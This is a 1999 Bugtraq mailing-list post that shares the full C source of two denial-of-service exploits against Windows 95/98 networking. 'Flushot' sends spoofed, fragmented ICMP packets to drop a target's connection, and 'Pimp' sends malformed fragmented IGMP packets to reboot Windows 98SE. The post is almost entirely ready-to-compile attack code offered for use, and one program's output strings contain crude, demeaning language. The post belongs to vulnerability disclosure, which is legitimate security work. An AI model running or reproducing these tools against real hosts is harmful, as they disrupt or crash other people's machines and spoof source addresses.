[11024] in bugtraq
About IGMP and another exploit for Windows95x/98x
daemon@ATHENA.MIT.EDU (Hector Leon)
Thu Jul 15 00:40:59 1999
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Message-Id: <003a01becda0$424ebb30$1311b0cf@DARKSTATION>
Date: Tue, 13 Jul 1999 21:26:17 -0500
Reply-To: Hector Leon <darksun@COMPUTER-MANIACS.COM>
From: Hector Leon <darksun@COMPUTER-MANIACS.COM>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
I got two exploit and test it...
- The first one is Flushot by DarkShow. This exploit can drop the =
network connection in windows 95 and 98(First Edition)
- The other one is Pimp by Rob Mosher, this exploit can reboot =
Windows98se
I have Rethat linux 5.0 installed....
Now... the exploits..
Sorry.. my english is a shit...
Have fun..
----------[FluSHOT.c START CUT =
HERE]--------------------------------------------------
/* Lags CPU Made By DarkShadow from The flu Hacking Group
Kills Win95-98 machines
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
void banner(void) {
=20
printf("Remote Flushot v 1.0\n\n");
=20
=20
printf("\n\n");
}
void usage(const char *progname) {
printf(" usage:\n");
printf("./flushot [Spoofed IP] [Destination IP] [# of FLushot to =
Send]\n",progname);
printf(" [Spoofed IP] : ex: 205.56.78.0\n");
printf(" [Destination IP] : ex: 201.12.3.76\n");
printf(" [# of FLushot to Send] : 100\n");
printf("The Flu Hacking Group (c)\n");
printf("DarkShadow PlimoMan Hack The Planet\n");
}
int resolve( const char *name, unsigned int port, struct sockaddr_in =
*addr ) {
struct hostent *host;
memset(addr,0,sizeof(struct sockaddr_in));
addr->sin_family =3D AF_INET;
addr->sin_addr.s_addr =3D inet_addr(name);
if (addr->sin_addr.s_addr =3D=3D -1) {
if (( host =3D gethostbyname(name) ) =3D=3D NULL ) {
fprintf(stderr,"ERROR: Unable to resolve host %s\n",name);
return(-1);
}
addr->sin_family =3D host->h_addrtype;
memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length);
}
addr->sin_port =3D htons(port);
return(0);
}
unsigned short in_cksum(addr, len)
u_short *addr;
int len;
{
register int nleft =3D len;
register u_short *w =3D addr;
register int sum =3D 0;
u_short answer =3D 0;
while (nleft > 1) {
sum +=3D *w++;
nleft -=3D 2;
}
if (nleft =3D=3D 1) {
*(u_char *)(&answer) =3D *(u_char *)w ;
sum +=3D answer;
}
sum =3D (sum >> 16) + (sum & 0xffff);
sum +=3D (sum >> 16); =20
answer =3D ~sum; =20
return(answer);
}
int send_winbomb(int socket,
unsigned long spoof_addr,
struct sockaddr_in *dest_addr) {
unsigned char *packet;
struct iphdr *ip;
struct icmphdr *icmp;
int rc;
packet =3D (unsigned char *)malloc(sizeof(struct iphdr) +
sizeof(struct icmphdr) + 8);
ip =3D (struct iphdr *)packet;
icmp =3D (struct icmphdr *)(packet + sizeof(struct iphdr));
memset(ip,0,sizeof(struct iphdr) + sizeof(struct icmphdr) + 8);
ip->ihl =3D 5;
ip->version =3D 4;
// ip->tos =3D 2;
ip->id =3D htons(1234);
ip->frag_off |=3D htons(0x2000);
// ip->tot_len =3D 0;
ip->ttl =3D 30;
ip->protocol =3D IPPROTO_ICMP;
ip->saddr =3D spoof_addr;
ip->daddr =3D dest_addr->sin_addr.s_addr;
ip->check =3D in_cksum(ip, sizeof(struct iphdr));
icmp->type =3D 12;
icmp->code =3D 0;
icmp->checksum =3D in_cksum(icmp,sizeof(struct icmphdr) + =
1);
if (sendto(socket,
packet,
sizeof(struct iphdr) +
sizeof(struct icmphdr) + 1,0,
(struct sockaddr *)dest_addr,
sizeof(struct sockaddr)) =3D=3D -1) { return(-1); }
ip->tot_len =3D htons(sizeof(struct iphdr) + sizeof(struct icmphdr) =
+ 8);
ip->frag_off =3D htons(8 >> 3);
ip->frag_off |=3D htons(0x2000);
ip->check =3D in_cksum(ip, sizeof(struct iphdr));
icmp->type =3D 0;
icmp->code =3D 0;
icmp->checksum =3D 0;
if (sendto(socket,
packet,
sizeof(struct iphdr) +
sizeof(struct icmphdr) + 8,0,
(struct sockaddr *)dest_addr,
sizeof(struct sockaddr)) =3D=3D -1) { return(-1); }
free(packet);
return(0);
}
int main(int argc, char * *argv) {
struct sockaddr_in dest_addr;
unsigned int i,sock;
unsigned long src_addr;
banner();
if ((argc !=3D 4)) {
usage(argv[0]);
return(-1);
}
if((sock =3D socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
fprintf(stderr,"ERROR: Opening raw socket.\n");
return(-1);
}
if (resolve(argv[1],0,&dest_addr) =3D=3D -1) { return(-1); }
src_addr =3D dest_addr.sin_addr.s_addr;
if (resolve(argv[2],0,&dest_addr) =3D=3D -1) { return(-1); }
printf("Status: Connected....packets sent.\n",argv[0]);
for (i =3D 0;i < atoi(argv[3]);i++) {
if (send_winbomb(sock,
src_addr,
&dest_addr) =3D=3D -1) {
fprintf(stderr,"ERROR: Unable to Connect To luser.\n");
return(-1);
}
usleep(10000);
}
}
----------[FluSHOT.c END CUT =
HERE]--------------------------------------------------
----------[Pimp.c START CUT =
HERE]--------------------------------------------------
/*
** pimp.c 6/4/99 by Rob Mosher: nyt@deadpig.org
** exploits bug in m$'s ip stack
** rewrite by nyt@EFnet
** bug found by klepto
** usage: pimp <host>
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <time.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <sys/socket.h>
struct igmp
{
unsigned char igmp_type;
unsigned char igmp_code;
unsigned short igmp_cksum;
struct in_addr igmp_group;
};
#define ERROR(a) {printf("ERROR: %s\n", a);exit(-1);}
u_long resolve(char *);
int main(int argc, char *argv[])
{
int nsock, ctr;
char *pkt, *data;
struct ip *nip;
struct igmp *nigmp;
struct sockaddr_in s_addr_in;
setvbuf(stdout, NULL, _IONBF, 0);
printf("pimp.c by nyt\n");
if(argc !=3D 2)
ERROR("usage: pimp <host>");
if((nsock =3D socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) =3D=3D -1)
ERROR("could not create raw socket");
pkt =3D malloc(1500);
if(!pkt)
ERROR("could not allocate memory");
memset(&s_addr_in, 0, sizeof(s_addr_in));
memset(pkt, 0, 1500);
nip =3D (struct ip *) pkt;
nigmp =3D (struct igmp *) (pkt + sizeof(struct ip));
data =3D (char *)(pkt + sizeof(struct ip) + sizeof(struct igmp));
memset(data, 'A', 1500-(sizeof(struct ip) + sizeof(struct igmp)));
s_addr_in.sin_addr.s_addr =3D resolve(argv[1]);
nip->ip_v =3D 4;
nip->ip_hl =3D 5;
nip->ip_tos =3D 0;
nip->ip_id =3D 69;
nip->ip_ttl =3D 255;
nip->ip_p =3D IPPROTO_IGMP;
nip->ip_sum =3D 0;
nip->ip_dst.s_addr =3D s_addr_in.sin_addr.s_addr;
nip->ip_src.s_addr =3D 2147100000;
nigmp->igmp_type =3D 2;
nigmp->igmp_code =3D 31;
nigmp->igmp_cksum =3D 0;
inet_aton("128.1.1.1", &nigmp->igmp_group);
printf("pimpin' dem trick-ass-bitches");
for(ctr =3D 0;ctr < 15;ctr++)
{
printf(".");
nip->ip_len =3D 1500;
nip->ip_off =3D htons(IP_MF);
sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in,
sizeof(s_addr_in));
nip->ip_off =3D htons(1480/8)|htons(IP_MF);
sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in,
sizeof(s_addr_in));
nip->ip_off =3D htons(5920/8)|htons(IP_MF);
sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in,
sizeof(s_addr_in));
nip->ip_len =3D 831;
nip->ip_off =3D htons(7400/8);
sendto(nsock, pkt, 831, 0, (struct sockaddr *) &s_addr_in,
sizeof(s_addr_in));
usleep(500000);
}
printf("*slap* *slap* bitch, who yo daddy\n");
shutdown(nsock, 2);
close(nsock);
}
u_long resolve(char *host)
{
struct hostent *he;
u_long ret;
if(!(he =3D gethostbyname(host)))
{
herror("gethostbyname()");
exit(-1);
}
memcpy(&ret, he->h_addr, sizeof(he->h_addr));
return ret;
}
----------[Pimp.c END CUT =
HERE]--------------------------------------------------
-- Hector Leon --
darksun@computer-maniacs.com
--CiMOS Computers Rep. Dom.--
